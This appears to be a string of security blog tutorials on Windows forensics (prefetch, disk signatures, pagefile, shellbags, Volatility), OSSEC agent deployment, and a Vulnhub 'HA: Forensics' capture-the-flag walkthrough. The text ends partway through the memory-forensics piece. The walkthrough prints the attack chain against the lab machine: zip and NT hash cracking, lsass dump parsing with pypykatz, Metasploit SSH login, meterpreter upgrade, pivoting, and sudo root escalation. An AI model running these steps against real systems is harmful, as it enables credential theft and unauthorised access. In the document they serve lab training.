Prefetch files were introduced in Windows XP. They are intended to accelerate the Windows boot process and applications' start-up process. In Windows XP, Vista, and 7 the number of prefetch files is limited to 128, whereas in Windows 8 and above it is up to 1024.

Proof of program execution can be a significant asset for a forensic investigator: prefetch files can prove that a certain executable was executed on the system, even if attempts were made to cover up the tracks. Before initiating forensic analysis of prefetch records, as a forensic examiner you should check whether the prefetching process is enabled.

To check the status of prefetching, open the following location in Registry editor:

Computer\HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management\PrefetchParameters

 


The value is set to 3 by default, as shown in the image above. It can be changed according to your prefetching needs. All the options that Windows provides in order to customize prefetching are explained below:

·         0: Prefetching Disabled

·         1: Application Prefetching Enabled

·         2: Boot Prefetching Enabled

·         3: Application and Boot both Enabled
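As a quick reference, the value-to-meaning mapping can be expressed as a small shell helper. This is a sketch for illustration only; on a real Windows system you would read the EnablePrefetcher value from the registry key above rather than pass it by hand:

```shell
# Hypothetical helper: translate the EnablePrefetcher registry value
# (0-3) into the prefetching mode it selects.
prefetch_mode() {
  case "$1" in
    0) echo "Prefetching Disabled" ;;
    1) echo "Application Prefetching Enabled" ;;
    2) echo "Boot Prefetching Enabled" ;;
    3) echo "Application and Boot both Enabled" ;;
    *) echo "Unknown value" ;;
  esac
}

prefetch_mode 3
```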

The metadata that can be found in a single prefetch file is as follows:

·         Executable's name

·         Eight character hash of the executable path.

·         The path of the executable file

·         Creation, modified, and accessed timestamp of executable

·         Run count (Number of time the application has been executed)

·         Last run time

·         Timestamps of the last 8 runs (the most recent run time plus the 7 previous run times)

·         Volume information

·         File Referenced by the executable

·         Directories  referenced by the executable

The prefetch files are saved under %SystemRoot%\Prefetch (C:\Windows\Prefetch).


To open the prefetch files location, you can directly search for "prefetch" in the Run command.

 


It can also be opened as a directory from the command prompt, which is good news for all the command-line lovers.



Forensic Analysis of Prefetch Files

WinPrefetch View

WinPrefetch View is a tool to read and examine the prefetch files stored in your system. The tool was developed by Nirsoft. This utility works with any variant of Windows, from Windows XP to Windows 10.

You can download the tool from here.



You can easily open the details of a particular prefetch file by simply clicking on it. Here, I have opened HFS.EXE-D3CAF0BF.pf for a detailed view. It shows details such as created time, modified time, file size, process path, run count, last run time, and missing process.

 


OS Forensics

OS Forensics is a digital forensic tool, a complete package for forensic investigation by PassMark Software. It is used to extract and analyze data, search files, recover deleted passwords, recover deleted evidence, and much more.

Download the tool from here.

 


Prefetch Explorer Command Line (PECmd)

PECmd is a command-line tool by Eric Zimmerman, used for bulk analysis of prefetch files. This tool can also export your prefetch artifacts to .csv and .json.

You can download the tool from here.

To begin, run the executable file. Let's parse the prefetch files using this tool; we will use the -d parameter to parse all the prefetch files in a directory.

PECmd.exe -d "C:\Windows\Prefetch"

 


In the image below, you can see the prefetch file for firefox.exe. The tool has parsed all the metadata explained in the introduction.

 


Similarly, through the following image, you can observe the prefetch file for HFS.exe. Such files will be created for every application you access.



FTK Imager

As a forensic investigator, you can always access the prefetch files to understand the case given to you, because through these files it can be determined what was frequently used on the system under investigation. This can be easily done with FTK Imager, which allows one to view and analyze the prefetch files present in the drive. To access the prefetch files through FTK Imager, just open the tool and look for the Prefetch folder in the left panel, as highlighted in the image below:

This is all on prefetch files. Now that we understand these files properly, we can customize them, access them, and use them as we need. The most important thing to know about prefetch files is that they are a boon when it comes to retracing malware, as any .exe file that has been run on the system will be logged in prefetch files. Therefore, if a malicious file is executed, you can track it through them.

Forensic Investigation: Disk Drive Signature


In this article, we will be using a disk drive signature to identify any suspicious changes in a system's directories or files. Creating such signatures can help us protect our data in various ways.

Table of Contents

·         Introduction

·         Creating disk signature

·         Comparing disk signature

Introduction

A disk drive signature is created to identify suspicious changes in your system's directories or files. This data incorporates information about a file's path, size, and other file attributes.

To create a disk drive signature, we will be using the OS Forensics tool by PassMark Software. OS Forensics allows you to create, compare, and analyze disk drive signatures.

We are going to create a signature for the Desktop only, to get quick results; you can create a disk drive signature of any disk or folder on your system as per your requirement.

To begin, let's first check the files present on the Desktop, so that you can get a clear idea after the comparison of the disk drive signatures.



 

 

Creating Disk Drive Signature

To create a disk signature, download the OS Forensics tool if you haven't already; you can download it from here. You can create the disk signature by selecting the options highlighted in the following screenshot.



Select the desired directory to create the signature. Here, I have selected Desktop; browse the directory and click Start. The signature for the data drive will then be created.

 



 

It will ask for a file name; enter the file name and click on Save. Now the signature for the selected drive will be created. Choose a file name for your signature as per your convenience; I will be naming the first signature "old signature" and the other one "new signature", just to be clear while comparing both signatures.



Now you can perform some modifications in the data drive, like deleting or editing some files, anything that you want. Then repeat the same steps to create another signature after making all the alterations in the drive.



After creating the before and after signatures, select Compare Signature as highlighted in the following screenshot. Browse the old and new signatures in the respective columns and select Compare. The comparison of the disk signatures helps to find any changes in the drive.



The result will show the files with their difference status (whether the file was deleted, modified, or created) along with the date and time. Comparing the two disk drive signatures shows a total of 7 differences: 4 new files, 2 deleted files, and 1 modified file.
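The snapshot-and-compare workflow above can be sketched in a few lines of Python. This is a minimal illustration of the idea only, not OSForensics' actual signature format: record each file's relative path, size, timestamp, and hash, then diff two snapshots.

```python
import hashlib
import os

def snapshot(root):
    """Walk a directory and record path -> (size, mtime, md5) for every file."""
    sig = {}
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, root)
            with open(path, "rb") as f:
                digest = hashlib.md5(f.read()).hexdigest()
            st = os.stat(path)
            sig[rel] = (st.st_size, int(st.st_mtime), digest)
    return sig

def compare(old, new):
    """Classify differences the way a signature comparison does."""
    created = sorted(set(new) - set(old))
    deleted = sorted(set(old) - set(new))
    modified = sorted(p for p in set(old) & set(new) if old[p][2] != new[p][2])
    return {"created": created, "deleted": deleted, "modified": modified}
```

Taking one snapshot before and one after the changes, and diffing them, yields the same created/deleted/modified classification the tool reports.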



From the bottom right, as depicted in the picture, you can view each class of difference separately. For instance, to view all the deleted files together, select deleted files from the drop-down column.


Creating and comparing disk drive signatures helps reveal suspicious changes in your system, as each signature is a snapshot of the drive's directory structure at the point of creation.

Forensic Investigation: Pagefile.sys


In this article, we will learn how to perform a forensic investigation on a page file. A lot of valuable artifacts can be extracted from a memory dump. Yet there is more: you can perform memory forensics even without a memory dump, by analysing virtual memory instead.

There are files on the drive that contain portions of memory: pagefile.sys, swapfile.sys, and hiberfil.sys. We will be moving forward with pagefile.sys.

 

Table of Contents

·         Introduction

·         Capturing the memory and pagefile using FTK imager

·         Analyzing using Belkasoft Evidence Centre

Introduction

The pagefile.sys, also referred to as the swap file or virtual memory file, is utilized by Windows operating systems to store data from RAM when it becomes full. It is located at C:\pagefile.sys. Windows supports up to 16 paging files, although usually only one is in use.

Whenever you open an application in Windows, your PC consumes RAM. When you have more applications open than your PC's RAM can handle, data belonging to programs already in RAM is moved to the page file. This is known as paging, and it means the page file acts as backup RAM, also known as virtual memory.

Capturing the memory and pagefile using FTK imager

We will use FTK Imager to capture the memory along with the pagefile.sys.

FTK® Imager is a tool for imaging and data preview. FTK Imager also creates perfect copies (forensic images) of computer data without making changes to the original evidence. You can download FTK Imager from here.

Click on capture memory to create a memory dump.

  


The next step is to browse to a destination path of your choice, select the option “Include pagefile”, and click on Capture Memory.



The memory capture process will begin once you click on capture memory.



After completion of the process, the memory dump and page file will be saved in the destination folder selected previously.


Analyzing using Belkasoft Evidence Centre

Now, to analyze the captured file, we will be using Belkasoft Evidence Centre. Belkasoft Evidence Centre is an all-in-one forensic tool for acquiring, analyzing, and carving digital evidence. You can download the free trial of the tool from here.

First of all, let's create a new case. Fill in the case information and select the root folder; if you want, you can add a case description as well. Click on Create and open to proceed further with the analysis.

 



 

To analyze the captured memory (pagefile), select the option RAM Image and add the pagefile.sys you captured earlier with FTK Imager as the evidence source.



Choose the desired data type you would like to search for. There are a whole lot of data types supported by the tool. Click finish afterward.



 

Here is the dashboard for the case after completion of the above steps. It shows proper segregated information about the data carved from the pagefile. A total of 1097 files have been carved, which includes URLs, pictures, and other artifacts.



The case explorer tab right next to the dashboard tab allows expanding and viewing each profile column. The data has been carved from browsers, pictures, system files, and other files as well.



Let’s expand and analyze the Browsers profile. It has carved the Chrome history, which consists of URLs; let's check the Chrome (carved) section for more details. It lists the URLs of the sites visited, one of which is highlighted in the following screenshot.



Another entry in the Browsers profile is Opera. Analyzing the Opera (carved) profile similarly shows details about the URLs visited.



The carved data from pagefile also consists of some images. These images can be from the sites I have visited and other thumbnails.



A great feature of Belkasoft Evidence Centre is that it lets you simply right-click on a picture and analyze it for various aspects, such as checking skin tones, detecting pornographic content, detecting text, and detecting faces. All of these are useful during live analysis.



 

Some system files are also carved from the captured virtual memory, showing the NetBIOS name, file path, and size.



 

The timeline tab shows the overall view of the data carved for easy analysis along with the time and URL of the search site visited.



A search results tab is also there in the tool which shows predefined search results. The following screenshot shows the search engine results along with the link and profile name. 

 

  


 

Similarly, you can perform a forensic investigation of hiberfil.sys (which stores the memory contents while the Windows system is in hibernate mode). Export it with FTK Imager from C:\hiberfil.sys and analyze it further using Belkasoft Evidence Centre.

The analysis of virtual memory files serves a great purpose in web browser forensics.
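The browser URLs that Belkasoft carves from the pagefile can also be recovered manually with a simple strings-style scan. A minimal sketch (the regex and chunking scheme here are illustrative, not how Belkasoft actually carves):

```python
import re

# Printable-ASCII URL pattern: 'http(s)://' followed by printable bytes.
URL_RE = re.compile(rb"https?://[\x21-\x7e]{4,}")

def carve_urls(path, chunk_size=1024 * 1024, overlap=128):
    """Scan a binary file (e.g. an exported pagefile.sys) for URL-like strings.

    Reads in chunks so an arbitrarily large pagefile never has to fit in
    memory; a small overlap catches URLs that straddle chunk boundaries.
    """
    urls = set()
    with open(path, "rb") as f:
        tail = b""
        while True:
            chunk = f.read(chunk_size)
            if not chunk:
                break
            for match in URL_RE.finditer(tail + chunk):
                urls.add(match.group().decode("ascii"))
            tail = chunk[-overlap:]
    return sorted(urls)
```

Running `carve_urls("pagefile.sys")` on the exported file gives a quick, tool-free list of candidate browsing artifacts to compare against the Belkasoft results.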


AlienVault: OSSEC (IDS) Deployment


In this article, we will discuss the deployment of OSSEC (IDS) agents to an AlienVault server.

OSSEC is an open-source, host-based intrusion detection system (commonly called a HIDS) that markets itself as the world’s most widely used intrusion detection system. It performs, or helps us with, monitoring of:

·         Network Anomalies

·         Log analysis

·         Integrity Checking

·         Windows registry monitoring

·         Rootkit detection

·         Process monitoring

·         Real-time alerting

·         Active response

·         Policy monitoring

Intrusion detection systems are customizable like a firewall; they can be configured to send alarm messages when a rule fires, or to respond automatically to a threat or warning on your network or device.

OSSEC (IDS) can warn us about DDoS, brute force, exploits, data leaks, and other external attacks. It monitors our network in real time and interacts with us and with our system as we decide. It can be used to monitor one server or thousands of servers in a server/agent mode.

 

Table of content

For Linux

·         Prerequisites

·         Required dependencies

·         Download OSSEC source code

·         Extract & install OSSEC agent from source code

·         Installation of OSSEC HIDS Agent

·         Deploying OSSEC Agent to OSSEC server

·         Running OSSEC Agent

For windows

·         Download OSSEC agent for Windows

·         Install OSSEC agent

·         Generate OSSEC key for the agent

·         Run and verify OSSEC agent is connected or running

 

Prerequisites

·         Ubuntu 20.04.1

·         Windows 10

·         Root or Admin privileges

 

For Ubuntu 20.04.1

 

Required Dependencies

To install the OSSEC agent on Ubuntu 20.04.1, some requirements need to be installed before the agent installation, as listed below:

·         GCC

·         Make

·         Libevent-dev

·         Zlib-dev

·         Libssl-dev

·         Libpcre2-dev

·         Wget

·         Tar

You can install all of these requirements by simply running this command:

 

apt install gcc make libevent-dev zlib1g-dev libssl-dev libpcre2-dev wget tar

 

Download OSSEC source code

 

You can download the latest OSSEC source code from the official release page on GitHub, or by simply running this command:

 

wget https://github.com/ossec/ossec-hids/archive/3.6.0.tar.gz -P /tmp

 



 

Extract & install OSSEC agent from source code

 

Once the source download completes, you can extract it by running:

 

cd /tmp

tar xzf 3.6.0.tar.gz

 

To install the OSSEC agent, navigate to the source code directory and run the installation script as shown below:

 

cd ossec-hids-3.6.0/

./install.sh

 

 


Then select your installation language, or press ENTER to choose the default, and follow the steps described below:

 



 

·         Specify the type of installation. In our case we are installing an OSSEC-HIDS agent, so we go with the option of agent.

·         Choose the installation path. By default, it is /var/ossec or you can define the path as per your environment.

·         Enter the OSSEC-HIDS server IP or AlienVault server IP.

·         Enable system integrity check.

·         Enable rootkit detection.

·         Enable or disable active response.

·         Once you are done with defining the default options, proceed to install the OSSEC agent by pressing ENTER

·         Then press ENTER to close the installer as shown below



Deploying OSSEC agent to AlienVault server

 

For the agent to communicate with the server:

 

·         You need to first add it to the HIDS server or AlienVault server

·         After that, extract the agent authentication key from the AlienVault server

 

To extract the agent key from the server, go to the AlienVault Web UI and navigate to Environment > Detection as shown below:



 

Then select or add the agent host where you installed the OSSEC agent, and extract or copy the key as shown below.



 

Once you have extracted the key, import it on the agent by running the following command:

 

/var/ossec/bin/manage_agents

 

Enter I, paste the key that you copied from the AlienVault Web UI, confirm adding the key, then exit by pressing Q as shown below.



 

Running OSSEC agent

Once the installation completes, start the OSSEC agent by running the following command:

 

/var/ossec/bin/ossec-control start

Or

systemctl start ossec

 



 

To stop the agent run the below command

 

/var/ossec/bin/ossec-control stop

Or

systemctl stop ossec

 

Other service control commands are described below.

 

/var/ossec/bin/ossec-control          {start|stop|reload|restart|status}

 

To check the status.

 

/var/ossec/bin/ossec-control status

 



 

Check the logs to see if the agent has connected to the server:

 

tail -f /var/ossec/logs/ossec.log

 



 

As you can see, the agent has successfully connected to the AlienVault server.

Congratulations!!! You have successfully deployed your Ubuntu machine to the AlienVault server.
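The log check above can also be scripted for many agents. A small sketch; the marker string is an assumption based on typical ossec-agentd log output, so adjust it to match the wording in your own ossec.log:

```python
def agent_connected(log_lines, marker="Connected to the server"):
    """Return the most recent log line showing the agent reached the server.

    `marker` is an assumed substring of the ossec-agentd success message;
    change it if your ossec.log words it differently.
    """
    hits = [line.strip() for line in log_lines if marker in line]
    return hits[-1] if hits else None

# Usage on the agent host:
#   with open("/var/ossec/logs/ossec.log") as f:
#       print(agent_connected(f) or "agent has not connected yet")
```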

 

For windows machine

 

Download OSSEC agent for Windows

You can download the OSSEC agent for Windows from the OSSEC official page.

Locate and select the package Agent Windows ossec-agent-win-32-3.6.exe, or the latest one, as shown below:

 



Install OSSEC agent

 

Go to the Downloads and run the OSSEC agent installer and hit next as shown below 

 



 

Choose the path where you want to install the OSSEC agent and hit install

 



 

Wait for the setup to complete, then hit Next.

 



 

Select finish and then exit from the installer.



 

Generate OSSEC key for the agent

 

Follow the steps as described below:

·         At AlienVault Web UI go to “Environment > Detection > HIDS”

·         Go to Agents (top right corner)

·         Add a new agent

·         Copy the key and use it at agent as shown below

 



Come back to the windows machine

Enter the AlienVault server IP and paste the key as shown below



 

After that confirm agent deployment by pressing ok

 



 

Run and verify OSSEC agent is connected or running

 

After successful deployment of the OSSEC agent, start its service by navigating to “Manage > Start OSSEC” as shown below.



 

As you can see, the agent has started successfully.



 

A new windows service can be found at OSSIM Web UI as shown below

Congratulation !!! you have successfully deployed your windows agent to the AlienVault server.

 



Hmm…

Let’s verify it by checking whether the Windows machine's logs are being processed: navigate to “Analysis > Security Events (SIEM)”.

 



 

Where 192.168.1.7 is my windows machine IP

As we can see the windows machine started sending the processing logs.

 

Hold tight! this is not enough…..

Have patience …

In this article, we explained the deployment of the OSSEC agent to AlienVault OSSIM.

In the next article, our focus will be on threat hunting, malware analysis, network traffic monitoring, and much more…

 

HA: Forensics: Vulnhub Walkthrough


Introduction

Today we are going to crack a vulnerable machine called HA: Forensics. This is a Capture the Flag type of challenge containing FOUR flags, which become accessible as the lab progresses, based on hints. It is a forensics-focused machine.

Download Lab from here.

 Penetration Testing Methodology

·         Network Scanning

o   Netdiscover

o   Nmap

·         Flag #1

o   Browsing the HTTP service

o   Directory Bruteforce using dirb

o   Enumerating an Image file

o   Extracting Metadata of Image file

o   Reading Flag #1

·         Flag #2

o   Directory Bruteforce using dirb

o   Decrypting PGP Encryption

o   Creating a Dictionary using crunch

o   Performing a Dictionary on ZIP file

o   Reading Flag #2

·         Flag #3

o   Enumerating DMP file using pypykatz

o   Extracting an NT hash

o   Cracking Hash using John the Ripper

o   SSH login using Metasploit

o   Convert SSH to Meterpreter

o   Enumerating Network Interfaces

o   AutoRoute an internal docker instance

o   Perform a ping sweep scan internally

o   Connect to the FTP service as Anonymous

o   Downloading the Image file

o   Transferring the Image file to the local machine

o   Analyze the image file using Autopsy

o   Reading Flag #3

·         Flag#4

o   Decoding the Base64 Encryption

o   Enumerating for Sudo permission

o   Exploiting the Sudo permissions on ALL

o   Reading Flag #4

Walkthrough

Network Scanning

To attack any machine, we need to find its IP address. This can be done using the netdiscover command. To find the IP address, we correlate the MAC address of the machine, which can be obtained from the virtual machine's configuration settings. The IP address of the machine was found to be 192.168.0.174.

netdiscover



Following the netdiscover scan, we run an nmap scan to get information about the services running on the virtual machine. An aggressive nmap scan reveals that 2 services are running: SSH (22) and HTTP (80).

nmap -A 192.168.0.174

 


Enumeration

Since the HTTP service is running on the virtual machine, let's take a look at the hosted webpage:

http://192.168.0.174



The webpage has a button that says “Click here to get flag!”. Make sure to click it.

FLAG #1

We see the webpage is a simple page with some forensics images. Nothing special. Next on the Enumeration tasks was Directory Bruteforce. We used our reliable dirb tool for the directory bruteforce.

dirb http://192.168.0.174/



This gave us an images directory. We looked into it through the web browser and found two images called DNA and fingerprint. We checked DNA; it was just a rabbit hole. Then we downloaded fingerprint.jpg to the local system to analyze it further.

 



This machine is based on forensics, and we have an image at hand, so Exiftool seems like the right tool to use. A simple look at the metadata of the image using Exiftool shows that we have our first flag!

exiftool fingerprint.jpg



Flag #2

Now, enumeration doesn't always end with one pass of directory bruteforce. When in doubt, always use the extension filter in dirb. We got a hit on the txt filter, and we have some tips.

dirb http://192.168.0.174 -X .txt



Looking at the tips.txt we see that it is a kind of robots.txt file just named tips. As we are on the hunt for flags, we choose to browse the flag.zip file first.



It gave us an option to save the file. Let’s do it.



Now that we have the zip file on our local system, it's time to extract its contents. We use the unzip command to extract the files inside flag.zip. It requires a password. We don't have one!!



We go back to the web browser and the tips file. There is a folder named igolder; it resembles a website that encrypts and decrypts messages with public and private keys. We browse the folder and see another text file called clue.txt. Upon reading the file, we see that it is a combination of a private key and an encrypted message.

http://192.168.0.174/igolder/clue.txt



To decrypt the message, we went to the igolder website and pasted the PGP private key and the encrypted message from the clue.txt file. After clicking the Decrypt Message button, we have the secret message. It tells us that the password is 6 characters: the first 3 are the letters “for” and the last 3 are numeric characters.



Whenever we have a partial hint of a password, we use crunch to create a dictionary fitting that pattern. We used crunch to create a dictionary named dict.txt for cracking the password. Using fcrackzip, we cracked the password: for007.

We unzip the file and we have a pdf file labeled flag. We also get a DMP file but more on that later.

crunch 6 6 -t for%%% -o dict.txt

fcrackzip -u -D -p dict.txt flag.zip

unzip flag.zip

 



Let’s open the PDF file and take a look at our Second Flag



Flag #3

Now, we have 2 flags, 2 more to go. We received a DMP file from the previous section. In forensics, a dump file can be inspected using pypykatz. So, we will use it to check for some hints inside.

pypykatz lsa minidump lsass.DMP



Looking at the DMP file a bit more thoroughly, we find an NT hash for a user called jasoos. The word means “detective” in Hindi. That might be a clue.



We copy the hash and paste it inside a file named hash. Now we have a hash file, and to crack it we use John the Ripper. After churning through, John the Ripper gave us the password: “Password@1”. That's not super secure, is it?

john --format=NT hash



Now, we could connect directly via SSH, but logging in through Metasploit is better, as it has a ton of post-exploitation tools that can be used afterward. Using the ssh_login module, we get an SSH session on the machine as the user jasoos. Using the shell_to_meterpreter script, we got ourselves a meterpreter session on the target machine.

use auxiliary/scanner/ssh/ssh_login

set rhosts 192.168.0.174

set username jasoos

set password Password@1

exploit

session -u 1

 



Using the ifconfig command, we see that there is a docker interface running on the machine with the IP address 172.17.0.1.

It is an internal IP address, which means we cannot normally access it from outside.

sessions 2

ifconfig



No need to panic: Metasploit has our back here. Its autoroute module can route traffic so that the internal network becomes reachable from outside; traffic for the new route is redirected into the internal service. However, autoroute doesn't tell us the IP address of the new host, so we perform a ping sweep to find the particular IP address we can further exploit. The ping sweep gives us the IP address: 172.17.0.2.

Now that we know the target IP address, let's see exactly what kind of service this docker instance is running. A port scan reveals that it is an FTP service, but we don't have any credentials for it. FTP has a feature whereby an anonymous user can log in and access files. To confirm whether this FTP server is configured that way, we use the ftp anonymous scanner in Metasploit.

use post/multi/manage/autoroute

set session 2

exploit

use post/multi/gather/ping_sweep

set session 2

set rhosts 172.17.0.0/24

exploit

use auxiliary/scanner/portscan/tcp

set rhosts 172.17.0.2

set port 1-100

exploit

use auxiliary/scanner/ftp/anonymous



It says that the FTP server allows anonymous login. So, let's enumerate the FTP service by connecting to it as anonymous. We have a directory called pub. Inside that directory, we have a file with a .001 extension; it seems to be an image file of the kind usually used in forensic investigation. It is labeled saboot, which means “evidence” in Hindi.

shell

python3 -c 'import pty;pty.spawn("/bin/bash")'

ftp 172.17.0.2

anonymous

ls

cd pub

ls

get saboot.001



Now, using the Python one-liner HTTP service, we transfer the file from the target machine to our local machine (on Python 3, the equivalent is python3 -m http.server).

exit

ls

python -m SimpleHTTPServer



As the Python one-liner runs and serves files on port 8000, we browse to that port and get our saboot file.

http://192.168.0.174:8000
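This serve-and-fetch transfer can also be scripted end to end with the Python 3 standard library. A sketch (requires Python 3.7+ for the directory argument; paths and file names here are illustrative):

```python
import functools
import http.server
import threading
import urllib.request

def serve_directory(directory, port=0):
    """Serve a directory over HTTP, the scripted twin of the one-liner above.

    port=0 asks the OS for a free port; the bound port is in
    httpd.server_address[1].
    """
    handler = functools.partial(http.server.SimpleHTTPRequestHandler,
                                directory=directory)
    httpd = http.server.ThreadingHTTPServer(("0.0.0.0", port), handler)
    threading.Thread(target=httpd.serve_forever, daemon=True).start()
    return httpd

def fetch(url, dest):
    """Download a served file, as the browser step above does."""
    urllib.request.urlretrieve(url, dest)
```

On the target you would call `serve_directory(".", 8000)`, and on the attacking machine `fetch("http://192.168.0.174:8000/saboot.001", "saboot.001")`.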



We decided to use the Autopsy Forensic Investigation tool to inspect the image captured. It can be started using the following command. It tells us that the Autopsy is accessible on localhost port 9999. Let’s open it.



Here, we have a Web Interface for the Autopsy. We click on the New Case button



We name the Case, Provide the description, and give the Investigator name for the documentation purposes. And again, click on the New Case button.



Now it creates a case. After creating a case, it requires a host for that particular case. It asks for the name of the host. After providing the name click on the Add Host button to continue.



After the creation of the host, it asks us to add an image file. This is the step where we add the image file, we acquired from the target machine.



It asks for the location of the image file. Since we downloaded it through our web browser, it must be in the Downloads folder. We provide the path as shown in the image below. Also, choose Partition in the Type option, since what we acquired is a partition rather than a whole disk. When done, click on the Next button to continue.

 


Here it asks for further options. Let them be the default and click on the Add button.



Now that our image has been mounted, it is time to analyze it. This can be done as shown in the image below.



We see that we have a bunch of files. Among those files, we have 2 text files. A flag file and a creds file. Let’s take a look at our Third Flag.



Flag #4

Now, we have a creds.txt file. We take a look at it and find some encoded text inside.



It looks like Base64 encoding. We use the echo command piped into a base64 decoder, as shown in the image below. This might be the password for another user.
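The echo | base64 -d step is equivalent to two lines of Python (the string below is a placeholder for illustration, not the actual contents of creds.txt):

```python
import base64

# Placeholder ciphertext -- the real string comes from the creds.txt
# recovered with Autopsy.
encoded = base64.b64encode(b"some-secret-password").decode()

# Equivalent of: echo <encoded> | base64 -d
decoded = base64.b64decode(encoded).decode()
print(decoded)
```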

 


We enumerate the home directory and find that there is another user by the name of forensics. The password must be for this user. We use the su command to log in as forensics with the password we found. Then we use sudo -l to find what kind of binaries we can use to elevate privileges, and find that ALL is permitted. So, we just use the sudo bash command and get root. The final flag is in the root directory: our fourth and final flag.

cd /home

ls

su forensics

jeenaliisagoodgirl

sudo -l

sudo bash

cd /root

cat root.txt



This concludes this vulnerable machine.

Forensic Investigation: Shellbags


In this article, we will be focusing on shellbags and their forensic analysis using ShellBags Explorer. Shellbags exist to enhance the user experience by remembering user preferences while exploring folders; the information stored in them is useful for forensic investigation.

Table of Contents

·         Introduction

·         Location of shellbags

·         Forensic analysis using Shellbags Explorer

·         Active Registry Analysis

·         Offline Registry Analysis

 

 Introduction

Shellbags are registry keys that are used to improve the user experience and recall the user's preferences whenever needed; they have been present since Windows XP and exist on all later Windows platforms. The creation of shellbags depends upon the activities performed by the user.

As a digital forensic investigator, with the help of shellbags, you can prove whether a specific folder was accessed by a particular user or not. You can even check whether the specific folder was created or was available or not. You can also find out whether external directories have been accessed on external devices or not.

For the most part, shellbags are intended to hold data about the user's activities while exploring Windows. This implies that if the user changes icon sizes from large icons to a grid, the settings get updated in the shellbag instantly. Whenever you open, close, or change the view options of any folder on your system, whether from Windows Explorer or from the Desktop, even by right-clicking or renaming the folder, a shellbag record is created or updated.

Location of shellbags

Windows XP

The shellbags for Windows XP are stored in NTUSER.DAT

·         Network folders references:\Software\Microsoft\Windows\Shell

·         Local folder references: \Software\Microsoft\Windows\ShellNoRoam

·         Removable device folders: \Software\Microsoft\Windows\StreamMRU

Windows 7 to Windows 10

Shellbags are a set of subkeys in the UsrClass.dat registry hive of Windows 10 systems. The shell bags are stored in both NTUSER.DAT and USRCLASS.DAT.

·         NTUSER.DAT: HKCU\Software\Microsoft\Windows\Shell

·         USRCLASS.DAT: HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\Shell

The majority of the data is found in the USRCLASS.DAT hive-like local, removable, and network folders’ data.

You can manually check shellbags entry in the registry editor like so. In the following screenshot, a shellbag entry for a folder named jeenali is shown.

 



 

The Shellbag data contains two main registry keys, BagMRU and Bags

·         BagMRU: This stores folder names and folder paths in a tree-like structure. The root directory is represented by the first BagMRU key, i.e. 0. BagMRU keys contain numbered values that correspond to their nested subkeys; all of these subkeys contain numbered values except the last child in each branch.

·         Bags: These store view preferences such as the size of the window, location, and view mode.


We will be analyzing the shellbags using the shellbag explorer.

1.       ShellBags explorer(SBECmd)

2.       Shellbags explorer (GUI version)

Shellbags explorer is a tool by Eric Zimmerman to analyze shellbags. The shellbags explorer is available in both versions cmd and GUI. You can download the tool from here.

Forensic Analysis of Shellbag

Analysis using SBECmd

Here we are using the SBECmd.exe (Cmd version of the shellbag explorer tool) by Eric Zimmerman. This cmd tool is great for command prompt lovers who prefer using commands over GUI.

To get a clear idea about how shell bags work and store data and how you can analyze it I have created a new folder named “raaj” which consists of a text document. Further, we will be renaming it to geet and then to jeenali. Let’s analyze the shellbags entries for this.



Open a command prompt, browse to the directory where the executable is present, and run it. To extract the shellbag data into a .csv file, use the following command:

SBECmd.exe -l --csv ./



As a result of the above command, a .csv file will be created in the directory.


 

Let's open the .csv file and analyze it.


As mentioned earlier, we renamed the folder “raaj” to “geet” and then to “jeenali”. As highlighted in the screenshot, the MFT entry number is the same for all three folder names, which shows that the folder was renamed.

Shellbags Explorer (GUI version)

Active Registry Analysis

Using ShellBags Explorer we can also analyze the active registry. Select “Load active registry”, which will load the registry in use by the active user.


 

The shellbags are successfully parsed from the active registry.



The shellbags parsed contains the shellbags entries created based on users’ activities. As depicted earlier the folder renamed will have a similar MFT entry number. I have created a folder named “raaj”, we will be further renaming it to “geet”.


 

Whenever a folder is renamed an entry is stored in shellbag, the MFT entry number of both the folder will be the same.



Now let's once again rename the folder, this time to jeenali. The MFT entry will be the same as the previous one.


 

Offline registry analysis

For offline analysis, we first have to extract the shellbags file which is USRCLASS.DAT. Let’s extract the shellbag file using FTK imager. Download FTK imager from here.

Let's add the evidence: go to Add Evidence Item.



Select the source for adding the evidence; here I have selected the logical drive, as that is where usrclass.dat resides.



Select the desired user drive. Click Finish.

 


Expand the tree to the location of usrclass.dat. Select the user you want to investigate and go to the following path to extract UsrClass.dat:

root > Users > Administrator > AppData > Local > Microsoft > Windows

 


 

We will be analyzing the usrclass.dat extracted in the step above using ShellBags Explorer by Eric Zimmerman.

As we have exported the registry hive, we will choose “Load offline hive”.



After successful parsing of the extracted shellbags file, you will be able to see entries for folders browsed, created, deleted, etc. Here are the entries for the folders renamed earlier; the MFT entry number is the same for all three.



Further, I deleted the folder named “jeenali”. Now let's check the shellbag data to see whether the deleted folder's entry still exists.



Yes, the shellbag keeps the entry even though the folder was later deleted.


 

Shellbags store entries for the directories accessed by the user, along with user preferences such as window size and icon size. ShellBags Explorer parses the shellbag entries and shows the absolute path of each directory accessed, its creation time, the file system, and child bags. The tool classifies the accessed folders according to their location. Shellbags are also created for compressed (ZIP) files, the command prompt, the search window, and for renaming, moving, and deleting a folder.

Memory Forensics: Using Volatility Framework


Cybercriminals and attackers have become so creative in their crimes that they have started finding methods to hide data in the volatile memory of systems. Today, in this article, we are going to build a greater understanding of live memory acquisition and its forensic analysis. Live memory acquisition is a method used to collect data when a system is found in an active state at a crime scene.

Table of Contents

·        Memory Acquisition

·        Importance of Memory Acquisition

·        Dump Format Supported

·        Memory Analysis Plugins

·         Imageinfo

·         Kdbgscan

·         Processes

·         DLLs

·         Handles

·         Netscan

·         Hivelist

·         Timeliner

·         Hashdump

·         Lsadump

·         Modscan

·         Filescan

·         Svcscan

·         History

·         Dumpregistry

·         Moddump

·         Procdump

·         Memdump

·         notepad

Memory Acquisition

It is the method of capturing and dumping the contents of volatile memory onto a non-volatile storage device, preserving it for further investigation. A RAM analysis can only be conducted successfully when the acquisition has been performed accurately, without corrupting the image of the volatile memory. In this phase, the investigator has to be careful about the decisions made while collecting the volatile data, as it won't exist after the system reboots. Volatile memory is also prone to alteration due to the processes continuously running in the background, and any external action on the suspect system may adversely impact the device's RAM.

Importance of Memory Acquisition

When volatile memory is captured, the following artifacts can be discovered, which can be useful to the investigation:

·         On-going processes and recently terminated processes

·         Files mapped in the memory (.exe, .txt, shared files, etc.)

·         Any open TCP/UDP ports or any active connections

